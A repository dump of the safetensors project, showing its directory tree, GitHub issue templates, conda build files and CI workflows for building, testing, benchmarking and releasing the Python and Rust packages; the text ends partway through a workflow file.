├── .dockerignore ├── .github ├── ISSUE_TEMPLATE │ ├── bug-report.yml │ ├── config.yml │ └── feature-request.yml ├── PULL_REQUEST_TEMPLATE.md ├── conda │ ├── bld.bat │ ├── build.sh │ └── meta.yaml ├── stale.yml └── workflows │ ├── build_documentation.yml │ ├── build_pr_documentation.yml │ ├── codecov.yml │ ├── delete_doc_comment.yml │ ├── delete_doc_comment_trigger.yml │ ├── python-bench.yml │ ├── python-release-conda.yml │ ├── python-release.yml │ ├── python.yml │ ├── rust-release.yml │ ├── rust.yml │ ├── stale.yml │ ├── trufflehog.yml │ └── upload_pr_documentation.yml ├── .gitignore ├── .pre-commit-config.yaml ├── Dockerfile.s390x.test ├── LICENSE ├── Makefile ├── README.md ├── RELEASE.md ├── attacks ├── README.md ├── numpy_dos_create.py ├── numpy_dos_get_pwned.py ├── paddle_ace_create.py ├── paddle_ace_get_pwned.py ├── safetensors_abuse_attempt_1.py ├── safetensors_abuse_attempt_2.py ├── safetensors_abuse_attempt_3.py ├── tf_ace_create.py ├── tf_ace_get_pwned.py ├── tf_safe_ace_create.py ├── tf_safe_ace_get_pwned.py ├── torch_ace_create.py ├── torch_ace_get_pwned.py ├── torch_dos_create.py └── torch_dos_get_pwned.py ├── bindings └── python │ ├── .gitignore │ ├── Cargo.toml │ ├── LICENSE │ ├── MANIFEST.in │ ├── Makefile │ ├── README.md │ ├── benches │ ├── test_flax.py │ ├── test_mlx.py │ ├── test_paddle.py │ ├── test_pt.py │ └── test_tf.py │ ├── convert.py │ ├── convert_all.py │ ├── fuzz.py │ ├── py_src │ └── safetensors │ │ ├── __init__.py │ │ ├── __init__.pyi │ │ ├── flax.py │ │ ├── mlx.py │ │ ├── numpy.py │ │ ├── paddle.py │ │ ├── py.typed │ │ ├── tensorflow.py │ │ └── torch.py │ ├── pyproject.toml │ ├── setup.cfg │ ├── src │ └── lib.rs │ ├── stub.py │ ├── tests │ ├── data │ │ └── __init__.py │ ├── test_flax_comparison.py │ ├── test_mlx_comparison.py │ ├── test_paddle_comparison.py │ ├── test_pt_comparison.py │ ├── test_pt_model.py │ ├── test_simple.py │ └── test_tf_comparison.py │ └── uv.lock ├── codecov.yaml ├── codecov.yml ├── docs ├── safetensors.schema.json └── source │ ├── _toctree.yml │ ├── api │ ├── flax.mdx │ ├── numpy.mdx │ ├── paddle.mdx │ ├── tensorflow.mdx │ └── torch.mdx │ ├── convert-weights.md │ ├── index.mdx │ ├── metadata_parsing.mdx │ ├── speed.mdx │ └── torch_shared_tensors.mdx ├── flake.lock ├── flake.nix └── safetensors ├── Cargo.toml ├── LICENSE ├── README.md ├── benches └── benchmark.rs ├── fuzz ├── .gitignore ├── Cargo.toml └── fuzz_targets │ └── fuzz_target_1.rs └── src ├── lib.rs ├── slice.rs └── tensor.rs /.dockerignore: -------------------------------------------------------------------------------- 1 | safetensors/target 2 | bindings/python/target 3 | Dockerfile.s390x.test 4 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug-report.yml: -------------------------------------------------------------------------------- 1 | name: "\U0001F41B Bug Report" 2 | description: Submit a bug report to help us improve safetensors 3 | body: 4 | - type: textarea 5 | id: system-info 6 | attributes: 7 | label: System Info 8 | description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below. 9 | placeholder: safetensors version, platform, python version, ... 10 | validations: 11 | required: true 12 | 13 | # - type: textarea 14 | # id: who-can-help 15 | # attributes: 16 | # label: Who can help? 17 | # description: | 18 | # Your issue will be replied to more quickly if you can figure out the right person to tag with @ 19 | # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**. 20 | # 21 | # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and 22 | # a core maintainer will ping the right person. 23 | # 24 | # Please tag fewer than 3 people. 25 | # 26 | # Models: 27 | 28 | # - text models: @ArthurZucker and @younesbelkada 29 | # - vision models: @amyeroberts 30 | # - speech models: @sanchit-gandhi 31 | # - graph models: @clefourrier 32 | # 33 | # Library: 34 | # 35 | # - flax: @sanchit-gandhi 36 | # - generate: @gante 37 | # - pipelines: @Narsil 38 | # - tensorflow: @gante and @Rocketknight1 39 | # - tokenizers: @ArthurZucker 40 | # - trainer: @sgugger 41 | # 42 | # Integrations: 43 | # 44 | # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100 45 | # - ray/raytune: @richardliaw, @amogkam 46 | # - Big Model Inference: @sgugger @muellerzr 47 | # 48 | # Documentation: @sgugger, @stevhliu and @MKhalusova 49 | # 50 | # Model hub: 51 | 52 | # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator. 53 | # 54 | # HF projects: 55 | # 56 | # - accelerate: [different repo](https://github.com/huggingface/accelerate) 57 | # - datasets: [different repo](https://github.com/huggingface/datasets) 58 | # - diffusers: [different repo](https://github.com/huggingface/diffusers) 59 | # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers) 60 | # 61 | # Maintained examples (not research project or legacy): 62 | # 63 | # - Flax: @sanchit-gandhi 64 | # - PyTorch: @sgugger 65 | # - TensorFlow: @Rocketknight1 66 | 67 | # Research projects are not maintained and should be taken as is. 68 | 69 | # placeholder: "@Username ..." 70 | 71 | - type: checkboxes 72 | id: information-scripts-examples 73 | attributes: 74 | label: Information 75 | description: 'The problem arises when using:' 76 | options: 77 | - label: "The official example scripts" 78 | - label: "My own modified scripts" 79 | 80 | - type: textarea 81 | id: reproduction 82 | validations: 83 | required: true 84 | attributes: 85 | label: Reproduction 86 | description: | 87 | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet. 88 | If you have code snippets, error messages, stack traces please provide them here as well. 89 | Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting 90 | Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code. 91 | 92 | placeholder: | 93 | Steps to reproduce the behavior: 94 | 95 | 1. 96 | 2. 97 | 3. 98 | 99 | 100 | - type: textarea 101 | id: expected-behavior 102 | validations: 103 | required: true 104 | attributes: 105 | label: Expected behavior 106 | description: "A clear and concise description of what you would expect to happen." 107 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/config.yml: -------------------------------------------------------------------------------- 1 | blank_issues_enabled: true 2 | version: 2.1 3 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature-request.yml: -------------------------------------------------------------------------------- 1 | name: "\U0001F680 Feature request" 2 | description: Submit a proposal/request for a new safetensors feature 3 | labels: [ "feature" ] 4 | body: 5 | - type: textarea 6 | id: feature-request 7 | validations: 8 | required: true 9 | attributes: 10 | label: Feature request 11 | description: | 12 | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist. 13 | 14 | - type: textarea 15 | id: motivation 16 | validations: 17 | required: true 18 | attributes: 19 | label: Motivation 20 | description: | 21 | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too. 22 | 23 | 24 | - type: textarea 25 | id: contribution 26 | validations: 27 | required: true 28 | attributes: 29 | label: Your contribution 30 | description: | 31 | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the CONTRIBUTING.MD [readme](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md) 32 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # What does this PR do? 2 | 3 | 12 | 13 | 14 | 15 | Fixes # (issue) or description of the problem this PR solves. 16 | -------------------------------------------------------------------------------- /.github/conda/bld.bat: -------------------------------------------------------------------------------- 1 | cd bindings\python 2 | %PYTHON% -m pip install . --prefix=%PREFIX% 3 | -------------------------------------------------------------------------------- /.github/conda/build.sh: -------------------------------------------------------------------------------- 1 | cd bindings/python 2 | $PYTHON -m pip install . --prefix=$PREFIX 3 | -------------------------------------------------------------------------------- /.github/conda/meta.yaml: -------------------------------------------------------------------------------- 1 | {% set name = "safetensors" %} 2 | 3 | package: 4 | name: "{{ name|lower }}" 5 | version: "{{ SAFETENSORS_VERSION }}" 6 | 7 | source: 8 | path: ../../ 9 | 10 | requirements: 11 | host: 12 | - pip 13 | - python x.x 14 | - setuptools 15 | - setuptools-rust 16 | - maturin 17 | 18 | run: 19 | - python x.x 20 | 21 | test: 22 | imports: 23 | - safetensors 24 | 25 | about: 26 | home: https://huggingface.co/docs/safetensors 27 | license: Apache License 2.0 28 | license_file: LICENSE 29 | summary: "Safe and portable way of storing tensors" 30 | -------------------------------------------------------------------------------- /.github/stale.yml: -------------------------------------------------------------------------------- 1 | # Number of days of inactivity before an issue becomes stale 2 | daysUntilStale: 60 3 | # Number of days of inactivity before a stale issue is closed 4 | daysUntilClose: 7 5 | # Issues with these labels will never be considered stale 6 | exemptLabels: 7 | - pinned 8 | - security 9 | # Label to use when marking an issue as stale 10 | staleLabel: wontfix 11 | # Comment to post when marking an issue as stale. Set to `false` to disable 12 | markComment: > 13 | This issue has been automatically marked as stale because it has not had 14 | recent activity. It will be closed if no further activity occurs. Thank you 15 | for your contributions. 16 | # Comment to post when closing a stale issue. Set to `false` to disable 17 | closeComment: false 18 | -------------------------------------------------------------------------------- /.github/workflows/build_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Build documentation 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | - doc-builder* 8 | - v*-release 9 | - use_templates 10 | 11 | jobs: 12 | build: 13 | uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main 14 | with: 15 | commit_sha: ${{ github.sha }} 16 | package: safetensors 17 | notebook_folder: safetensors_doc 18 | package_path: safetensors/bindings/python/ 19 | version_tag_suffix: bindings/python/py_src/ 20 | install_rust: true 21 | custom_container: huggingface/transformers-doc-builder 22 | secrets: 23 | token: ${{ secrets.HUGGINGFACE_PUSH }} 24 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} 25 | -------------------------------------------------------------------------------- /.github/workflows/build_pr_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Build PR Documentation 2 | 3 | on: 4 | pull_request: 5 | paths: 6 | - "docs/**" 7 | - "bindings/python/py_src/**" 8 | - ".github/workflows/build_pr_documentation.yml" 9 | 10 | concurrency: 11 | group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }} 12 | cancel-in-progress: true 13 | 14 | jobs: 15 | build: 16 | uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main 17 | with: 18 | commit_sha: ${{ github.event.pull_request.head.sha }} 19 | pr_number: ${{ github.event.number }} 20 | package: safetensors 21 | package_path: safetensors/bindings/python/ 22 | version_tag_suffix: bindings/python/py_src/ 23 | install_rust: true 24 | custom_container: huggingface/transformers-doc-builder 25 | -------------------------------------------------------------------------------- /.github/workflows/codecov.yml: -------------------------------------------------------------------------------- 1 | name: Code coverage 2 | on: 3 | push: 4 | branches: 5 | - main 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | defaults: 11 | run: 12 | working-directory: ./safetensors 13 | 14 | steps: 15 | - uses: actions/checkout@v3 16 | 17 | - name: Install Rust Stable 18 | uses: actions-rs/toolchain@v1 19 | with: 20 | toolchain: stable 21 | components: llvm-tools-preview 22 | override: true 23 | 24 | - uses: Swatinem/rust-cache@v2 25 | 26 | - name: Install cargo-llvm-cov for Ubuntu 27 | run: cargo install cargo-llvm-cov 28 | 29 | - name: Coverage report 30 | run: cargo llvm-cov --release --lcov --output-path lcov.info 31 | 32 | - name: Upload to codecov.io 33 | uses: codecov/codecov-action@v3 34 | with: 35 | token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos 36 | working-directory: ./safetensors 37 | fail_ci_if_error: true 38 | -------------------------------------------------------------------------------- /.github/workflows/delete_doc_comment.yml: -------------------------------------------------------------------------------- 1 | name: Delete doc comment 2 | 3 | on: 4 | workflow_run: 5 | workflows: ["Delete doc comment trigger"] 6 | types: 7 | - completed 8 | 9 | jobs: 10 | delete: 11 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main 12 | secrets: 13 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }} -------------------------------------------------------------------------------- /.github/workflows/delete_doc_comment_trigger.yml: -------------------------------------------------------------------------------- 1 | name: Delete doc comment trigger 2 | 3 | on: 4 | pull_request: 5 | types: [ closed ] 6 | 7 | jobs: 8 | delete: 9 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main 10 | with: 11 | pr_number: ${{ github.event.number }} -------------------------------------------------------------------------------- /.github/workflows/python-bench.yml: -------------------------------------------------------------------------------- 1 | name: Simple benchmarks 2 | on: 3 | push: 4 | branches: 5 | - main 6 | pull_request: 7 | 8 | 9 | permissions: 10 | # deployments permission to deploy GitHub pages website 11 | deployments: write 12 | # contents permission to update benchmark contents in gh-pages branch 13 | contents: write 14 | 15 | jobs: 16 | benchmark: 17 | name: Performance regression check 18 | runs-on: ubuntu-latest 19 | steps: 20 | - uses: actions/checkout@v4 21 | - name: Install Rust 22 | uses: actions-rs/toolchain@v1 23 | with: 24 | toolchain: stable 25 | components: rustfmt, clippy 26 | 27 | - name: Install Python 28 | uses: actions/setup-python@v4 29 | with: 30 | python-version: "3.12" 31 | architecture: "x64" 32 | 33 | - name: Install 34 | working-directory: ./bindings/python 35 | run: | 36 | pip install -U pip uv 37 | uv sync --extra dev 38 | 39 | - name: Run tests 40 | working-directory: ./bindings/python 41 | run: | 42 | cargo test 43 | uv run pytest --benchmark-json output.json benches/ 44 | # Download previous benchmark result from cache (if exists) 45 | - name: Download previous benchmark data 46 | uses: actions/cache@v4 47 | with: 48 | path: ./cache 49 | key: ${{ runner.os }}-benchmark 50 | # Run `github-action-benchmark` action 51 | - name: Store benchmark result 52 | uses: benchmark-action/github-action-benchmark@v1 53 | with: 54 | # What benchmark tool the output.txt came from 55 | tool: 'pytest' 56 | # Where the output from the benchmark tool is stored 57 | output-file-path: ./bindings/python/output.json 58 | github-token: ${{ secrets.GITHUB_TOKEN }} 59 | # Push and deploy GitHub pages branch automatically 60 | auto-push: true 61 | comment-on-alert: true 62 | # Mention @rhysd in the commit comment 63 | alert-comment-cc-users: '@Narsil' 64 | -------------------------------------------------------------------------------- /.github/workflows/python-release-conda.yml: -------------------------------------------------------------------------------- 1 | name: Python Release - Conda 2 | 3 | on: 4 | push: 5 | tags: 6 | - v* 7 | 8 | env: 9 | ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }} 10 | 11 | jobs: 12 | build_and_package: 13 | runs-on: ${{ matrix.os }} 14 | strategy: 15 | matrix: 16 | os: [windows-latest, macos-latest] 17 | # 3.11 not available on Conda yet. 18 | python: ["3.8", "3.9", "3.10", "3.11"] 19 | 20 | steps: 21 | - name: Checkout repository 22 | uses: actions/checkout@v3 23 | 24 | - name: Install miniconda 25 | uses: conda-incubator/setup-miniconda@v2 26 | with: 27 | auto-update-conda: true 28 | python-version: ${{ matrix.python }} 29 | 30 | - name: Conda info 31 | shell: bash -l {0} 32 | run: conda info 33 | 34 | - name: Install Rust 35 | uses: actions-rs/toolchain@v1 36 | with: 37 | toolchain: stable 38 | 39 | - name: Setup conda env 40 | shell: bash -l {0} 41 | run: | 42 | conda install setuptools-rust 43 | conda install -c defaults anaconda-client conda-build 44 | 45 | - name: Extract version 46 | shell: bash -l {0} 47 | working-directory: ./bindings/python 48 | run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV 49 | 50 | - name: Build conda packages 51 | shell: bash -l {0} 52 | run: | 53 | conda info 54 | conda list 55 | conda-build .github/conda --python=${{ matrix.python }} 56 | 57 | - name: Upload to Anaconda 58 | shell: bash -l {0} 59 | run: | 60 | anaconda upload `conda-build .github/conda --output` --force 61 | 62 | build_and_package_linux: 63 | runs-on: ubuntu-latest 64 | container: quay.io/pypa/manylinux2014_x86_64 65 | 66 | strategy: 67 | fail-fast: false 68 | matrix: 69 | python: [38, 39, 310, 311] 70 | include: 71 | - python: 38 72 | checksum: e2a4438671e0e42c5bba14cb51de6ce9763938184d6ca2967340bbe972bbe7e6 73 | - python: 39 74 | checksum: 9829d95f639bd0053b2ed06d1204e60644617bf37dd5cc57523732e0e8d64516 75 | - python: 310 76 | checksum: ea5e6e8a3d5a0247b9df85382d27220fac8e59b5778fd313c5913879cd9baafc 77 | - python: 311 78 | checksum: 634d76df5e489c44ade4085552b97bebc786d49245ed1a830022b0b406de5817 79 | 80 | steps: 81 | - name: Checkout repository 82 | uses: actions/checkout@v2 83 | 84 | - name: Install miniconda 85 | run: | 86 | yum install -y wget openssl-devel 87 | export FILENAME=Miniconda3-py${{ matrix.python }}_23.5.2-0-Linux-x86_64.sh 88 | wget https://repo.anaconda.com/miniconda/$FILENAME 89 | sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}' 90 | bash $FILENAME -b -p $HOME/miniconda 91 | source $HOME/miniconda/bin/activate 92 | 93 | - name: Show glibc information 94 | shell: bash -l {0} 95 | run: ldd --version 96 | 97 | - name: Conda info 98 | shell: bash -l {0} 99 | run: | 100 | source $HOME/miniconda/bin/activate 101 | conda info 102 | 103 | - name: Install Rust 104 | uses: actions-rs/toolchain@v1 105 | with: 106 | toolchain: stable 107 | 108 | - name: Setup conda env 109 | shell: bash -l {0} 110 | run: | 111 | source $HOME/miniconda/bin/activate 112 | conda install setuptools-rust 113 | conda install -c defaults anaconda-client conda-build 114 | 115 | - name: Extract version 116 | shell: bash -l {0} 117 | working-directory: ./bindings/python 118 | run: | 119 | source $HOME/miniconda/bin/activate 120 | echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV 121 | 122 | - name: Build conda packages 123 | shell: bash -l {0} 124 | run: | 125 | source $HOME/miniconda/bin/activate 126 | conda info 127 | conda list 128 | conda-build .github/conda --python=${{ matrix.python }} 129 | 130 | - name: Upload to Anaconda 131 | shell: bash -l {0} 132 | run: | 133 | source $HOME/miniconda/bin/activate 134 | anaconda upload `conda-build .github/conda --output` --force 135 | -------------------------------------------------------------------------------- /.github/workflows/python-release.yml: -------------------------------------------------------------------------------- 1 | # This file is autogenerated by maturin v1.7.4 2 | # To update, run 3 | # 4 | # maturin generate-ci github -m bindings/python/Cargo.toml 5 | # 6 | name: CI 7 | 8 | on: 9 | push: 10 | branches: 11 | - main 12 | - master 13 | tags: 14 | - '*' 15 | pull_request: 16 | workflow_dispatch: 17 | 18 | permissions: 19 | contents: read 20 | 21 | jobs: 22 | linux: 23 | runs-on: ${{ matrix.platform.runner }} 24 | strategy: 25 | matrix: 26 | platform: 27 | - runner: ubuntu-latest 28 | target: x86_64 29 | - runner: ubuntu-latest 30 | target: x86 31 | - runner: ubuntu-latest 32 | target: aarch64 33 | - runner: ubuntu-latest 34 | target: armv7 35 | - runner: ubuntu-latest 36 | target: s390x 37 | - runner: ubuntu-latest 38 | target: ppc64le 39 | steps: 40 | - uses: actions/checkout@v4 41 | - uses: actions/setup-python@v5 42 | with: 43 | python-version: 3.x 44 | - name: Build wheels 45 | uses: PyO3/maturin-action@v1 46 | with: 47 | target: ${{ matrix.platform.target }} 48 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 49 | sccache: 'true' 50 | manylinux: auto 51 | - name: Upload wheels 52 | uses: actions/upload-artifact@v4 53 | with: 54 | name: wheels-linux-${{ matrix.platform.target }} 55 | path: dist 56 | 57 | musllinux: 58 | runs-on: ${{ matrix.platform.runner }} 59 | strategy: 60 | matrix: 61 | platform: 62 | - runner: ubuntu-latest 63 | target: x86_64 64 | - runner: ubuntu-latest 65 | target: x86 66 | - runner: ubuntu-latest 67 | target: aarch64 68 | - runner: ubuntu-latest 69 | target: armv7 70 | steps: 71 | - uses: actions/checkout@v4 72 | - uses: actions/setup-python@v5 73 | with: 74 | python-version: 3.x 75 | - name: Build wheels 76 | uses: PyO3/maturin-action@v1 77 | with: 78 | target: ${{ matrix.platform.target }} 79 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 80 | sccache: 'true' 81 | manylinux: musllinux_1_2 82 | - name: Upload wheels 83 | uses: actions/upload-artifact@v4 84 | with: 85 | name: wheels-musllinux-${{ matrix.platform.target }} 86 | path: dist 87 | 88 | windows: 89 | runs-on: ${{ matrix.platform.runner }} 90 | strategy: 91 | matrix: 92 | platform: 93 | - runner: windows-latest 94 | target: x64 95 | - runner: windows-latest 96 | target: x86 97 | steps: 98 | - uses: actions/checkout@v4 99 | - uses: actions/setup-python@v5 100 | with: 101 | python-version: 3.x 102 | architecture: ${{ matrix.platform.target }} 103 | - name: Build wheels 104 | uses: PyO3/maturin-action@v1 105 | with: 106 | target: ${{ matrix.platform.target }} 107 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 108 | sccache: 'true' 109 | - name: Upload wheels 110 | uses: actions/upload-artifact@v4 111 | with: 112 | name: wheels-windows-${{ matrix.platform.target }} 113 | path: dist 114 | 115 | macos: 116 | runs-on: ${{ matrix.platform.runner }} 117 | strategy: 118 | matrix: 119 | platform: 120 | - runner: macos-13 121 | target: x86_64 122 | - runner: macos-14 123 | target: aarch64 124 | steps: 125 | - uses: actions/checkout@v4 126 | - uses: actions/setup-python@v5 127 | with: 128 | python-version: 3.x 129 | - name: Build wheels 130 | uses: PyO3/maturin-action@v1 131 | with: 132 | target: ${{ matrix.platform.target }} 133 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 134 | sccache: 'true' 135 | - name: Upload wheels 136 | uses: actions/upload-artifact@v4 137 | with: 138 | name: wheels-macos-${{ matrix.platform.target }} 139 | path: dist 140 | 141 | sdist: 142 | runs-on: ubuntu-latest 143 | steps: 144 | - uses: actions/checkout@v4 145 | - name: Build sdist 146 | uses: PyO3/maturin-action@v1 147 | with: 148 | command: sdist 149 | args: --out dist --manifest-path bindings/python/Cargo.toml 150 | - name: Upload sdist 151 | uses: actions/upload-artifact@v4 152 | with: 153 | name: wheels-sdist 154 | path: dist 155 | 156 | release: 157 | name: Release 158 | runs-on: ubuntu-latest 159 | if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }} 160 | needs: [linux, musllinux, windows, macos, sdist] 161 | permissions: 162 | # Use to sign the release artifacts 163 | id-token: write 164 | # Used to upload release artifacts 165 | contents: write 166 | # Used to generate artifact attestation 167 | attestations: write 168 | steps: 169 | - uses: actions/download-artifact@v4 170 | - name: Generate artifact attestation 171 | uses: actions/attest-build-provenance@v1 172 | with: 173 | subject-path: 'wheels-*/*' 174 | - name: Publish to PyPI 175 | if: "startsWith(github.ref, 'refs/tags/')" 176 | uses: PyO3/maturin-action@v1 177 | env: 178 | MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}} 179 | with: 180 | command: upload 181 | args: --non-interactive --skip-existing wheels-*/* 182 | -------------------------------------------------------------------------------- /.github/workflows/python.yml: -------------------------------------------------------------------------------- 1 | name: Python 2 | 3 | on: 4 | pull_request: 5 | 6 | jobs: 7 | build_and_test: 8 | name: Check everything builds & tests 9 | runs-on: ${{ matrix.os }} 10 | strategy: 11 | matrix: 12 | os: [ubuntu-latest, macos-13, windows-latest] 13 | # Lowest and highest, no version specified so that 14 | # new releases get automatically tested against 15 | version: [{torch: torch==1.10, python: "3.9", arch: "x64"}, {torch: torch, python: "3.12", arch: "x64"}] 16 | # TODO this would include macos ARM target. 17 | # however jax has an illegal instruction issue 18 | # that exists only in CI (probably difference in instruction support). 19 | # include: 20 | # - os: macos-latest 21 | # version: 22 | # torch: torch 23 | # python: "3.11" 24 | include: 25 | - os: ubuntu-latest 26 | version: 27 | torch: torch 28 | python: "3.13" 29 | arch: "x64-freethreaded" 30 | defaults: 31 | run: 32 | working-directory: ./bindings/python 33 | steps: 34 | - name: Checkout repository 35 | uses: actions/checkout@v3 36 | 37 | 38 | - name: Install Rust 39 | uses: actions-rs/toolchain@v1 40 | with: 41 | toolchain: stable 42 | components: rustfmt, clippy 43 | 44 | - name: Cargo install audit 45 | run: cargo install cargo-audit 46 | 47 | - uses: Swatinem/rust-cache@v2 48 | with: 49 | workspaces: "bindings/python" 50 | 51 | - name: Install Python 52 | uses: actions/setup-python@v5 53 | with: 54 | python-version: ${{ matrix.version.python }} 55 | architecture: ${{ matrix.version.arch }} 56 | 57 | - name: Lint with RustFmt 58 | run: cargo fmt -- --check 59 | 60 | - name: Lint with Clippy 61 | run: cargo clippy --all-targets --all-features -- -D warnings 62 | 63 | - name: Run Audit 64 | run: cargo audit -D warnings 65 | 66 | - name: Install 67 | run: | 68 | pip install -U pip 69 | pip install .[numpy] 70 | 71 | - name: Install (torch) 72 | if: matrix.version.arch != 'x64-freethreaded' 73 | run: | 74 | pip install ${{ matrix.version.torch }} 75 | shell: bash 76 | 77 | - name: Install (torch freethreaded) 78 | if: matrix.version.arch == 'x64-freethreaded' 79 | run: | 80 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cu126 81 | shell: bash 82 | 83 | - name: Install (tensorflow) 84 | if: matrix.version.arch != 'x64-freethreaded' 85 | run: | 86 | pip install .[tensorflow] 87 | shell: bash 88 | 89 | - name: Install (jax, flax) 90 | if: matrix.os != 'windows-latest' && matrix.version.arch != "x64-freethreaded" 91 | run: 92 | pip install .[jax] 93 | shell: bash 94 | 95 | - name: Install (mlx) 96 | if: matrix.os == 'macos-latest' 97 | run: | 98 | pip install .[mlx] 99 | shell: bash 100 | 101 | - name: Check style 102 | run: | 103 | pip install .[quality] 104 | black --check --line-length 119 --target-version py35 py_src/safetensors tests 105 | 106 | - name: Run tests 107 | run: | 108 | cargo test 109 | pip install .[testing] 110 | pytest -sv tests/ 111 | 112 | test_s390x_big_endian: 113 | runs-on: ubuntu-latest 114 | permissions: 115 | contents: write 116 | packages: write 117 | name: Test bigendian - S390X 118 | steps: 119 | - uses: actions/checkout@v2 120 | - name: Set up QEMU 121 | uses: docker/setup-qemu-action@v2 122 | - name: Set up Docker Buildx 123 | uses: docker/setup-buildx-action@v2 124 | - name: Set short sha 125 | id: vars 126 | run: echo "GITHUB_SHA_SHORT=$(git rev-parse --short HEAD)" >> $GITHUB_ENV 127 | - name: Docker meta 128 | id: meta 129 | uses: docker/metadata-action@v4 130 | with: 131 | # list of Docker images to use as base name for tags 132 | images: | 133 | ghcr.io/huggingface/safetensors/s390x 134 | # generate Docker tags based on the following events/attributes 135 | tags: | 136 | type=schedule 137 | type=ref,event=branch 138 | type=ref,event=pr 139 | type=semver,pattern={{version}} 140 | type=semver,pattern={{major}}.{{minor}} 141 | type=semver,pattern={{major}} 142 | type=sha 143 | - name: Login to Registry 144 | uses: docker/login-action@v3 145 | with: 146 | registry: ghcr.io 147 | username: ${{ github.actor }} 148 | password: ${{ secrets.GITHUB_TOKEN }} 149 | - name: Test big endian 150 | uses: docker/build-push-action@v4 151 | with: 152 | platforms: linux/s390x 153 | file: Dockerfile.s390x.test 154 | tags: ${{ steps.meta.outputs.tags }} 155 | labels: ${{ steps.meta.outputs.labels }} 156 | cache-from: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max 157 | cache-to: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max 158 | -------------------------------------------------------------------------------- /.github/workflows/rust-release.yml: -------------------------------------------------------------------------------- 1 | name: Rust Release 2 | 3 | env: 4 | CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }} 5 | 6 | on: 7 | push: 8 | tags: 9 | - v* 10 | 11 | jobs: 12 | rust_publish: 13 | runs-on: ubuntu-latest 14 | steps: 15 | - name: Checkout repository 16 | uses: actions/checkout@v3 17 | 18 | - name: Install Rust 19 | uses: actions-rs/toolchain@v1 20 | with: 21 | toolchain: stable 22 | 23 | - name: Cache Cargo Registry 24 | uses: actions/cache@v1 25 | with: 26 | path: ~/.cargo/registry 27 | key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }} 28 | 29 | - name: Publish package rust 30 | if: ${{ !contains(github.ref, 'rc') }} 31 | working-directory: ./safetensors 32 | run: cargo publish --token ${CRATES_TOKEN} 33 | 34 | -------------------------------------------------------------------------------- /.github/workflows/rust.yml: -------------------------------------------------------------------------------- 1 | name: Rust 2 | 3 | on: 4 | pull_request: 5 | 6 | jobs: 7 | build: 8 | runs-on: ${{ matrix.os }} 9 | strategy: 10 | matrix: 11 | os: [ubuntu-latest, windows-latest, macOS-latest] 12 | toolchain: [stable] 13 | include: 14 | - os: ubuntu-latest 15 | toolchain: "1.74" 16 | defaults: 17 | run: 18 | working-directory: ./safetensors 19 | 20 | steps: 21 | - uses: actions/checkout@v3 22 | 23 | - name: Install Rust Stable 24 | uses: actions-rs/toolchain@v1 25 | with: 26 | toolchain: stable 27 | components: rustfmt, clippy, llvm-tools-preview 28 | override: true 29 | 30 | - uses: Swatinem/rust-cache@v2 31 | 32 | - name: Install cargo-audit 33 | run: cargo install cargo-audit 34 | 35 | - name: Install cargo-llvm-cov for Ubuntu 36 | if: matrix.os == 'ubuntu-latest' 37 | run: cargo install cargo-llvm-cov 38 | 39 | - name: Build 40 | run: cargo build --all-targets --verbose 41 | 42 | - name: Lint with Clippy 43 | run: cargo clippy --all-targets -- -D warnings 44 | 45 | - name: Run Tests 46 | run: cargo test --verbose 47 | 48 | - name: Run No-STD Tests 49 | run: cargo test --no-default-features --features alloc --verbose 50 | 51 | - name: Run Audit 52 | # RUSTSEC-2021-0145 is criterion so only within benchmarks 53 | run: cargo audit -D warnings --ignore RUSTSEC-2021-0145 54 | 55 | - name: Coverage report 56 | if: matrix.os == 'ubuntu-latest' 57 | run: cargo llvm-cov --release --lcov 